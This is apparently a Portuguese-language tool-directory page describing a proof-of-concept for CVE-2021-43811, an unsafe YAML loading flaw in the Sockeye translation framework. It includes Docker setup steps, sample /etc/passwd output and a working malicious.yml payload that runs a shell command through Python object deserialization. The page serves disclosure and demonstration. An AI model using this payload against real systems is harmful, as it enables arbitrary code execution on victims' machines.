Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
Ferramentas/GitHubGitHub/s-index/cve-2021-43811
Geração de PayloadsAnálise de VulnerabilidadesAnálise de CódigoExploraçãoPapers e PesquisaAprendizado e Educação
GitHubs-index/cve-2021-43811

CVE-2021-43811

awslabs/sockeye Injeção de código via carregamento inseguro de YAML CVE-2021-43811

Ver Repositório
2249há 4 anosAinda não revisado

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar

CVE-2021-43811

awslabs/sockeye Injeção de código por meio de carregamento inseguro de YAML CVE-2021-43811

Descrição da NVD

Sockeye é um framework open-source de sequência-a-sequência para Tradução Neural Automática construído sobre PyTorch. O Sockeye usa YAML para armazenar configurações de modelo e dados em disco. Versões anteriores à 2.3.24 usam carregamento inseguro de YAML, que pode ser utilizado para executar código arbitrário embutido em arquivos de configuração. Um atacante pode adicionar código malicioso ao arquivo de configuração de um modelo treinado e tentar convencer usuários a baixá-lo e executá-lo. Se os usuários executarem o modelo, o código embutido será executado localmente. O problema foi corrigido na versão 2.3.24.

Demonstração

cve-2021-43811

Configuração

  1. Construa uma imagem a partir de um Dockerfile
root@kitploit:~
docker build -t cve-2021-43811 .
  1. Execute python main.py em um novo contêiner
root@kitploit:~
docker run -it --rm cve-2021-43811

saída /etc/passwd

root@kitploit:~
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
-- snip --

output-image

Payload do PoC

malicious.yml

root@kitploit:~
!!python/object/new:type
args: ['z', !!python/tuple [], {'extend': !!python/name:exec }]
listitems: "__import__('os').system('cat /etc/passwd')"

Referência

  • https://github.com/awslabs/sockeye/security/advisories/GHSA-ggmr-44cv-24pm
Baixar ferramenta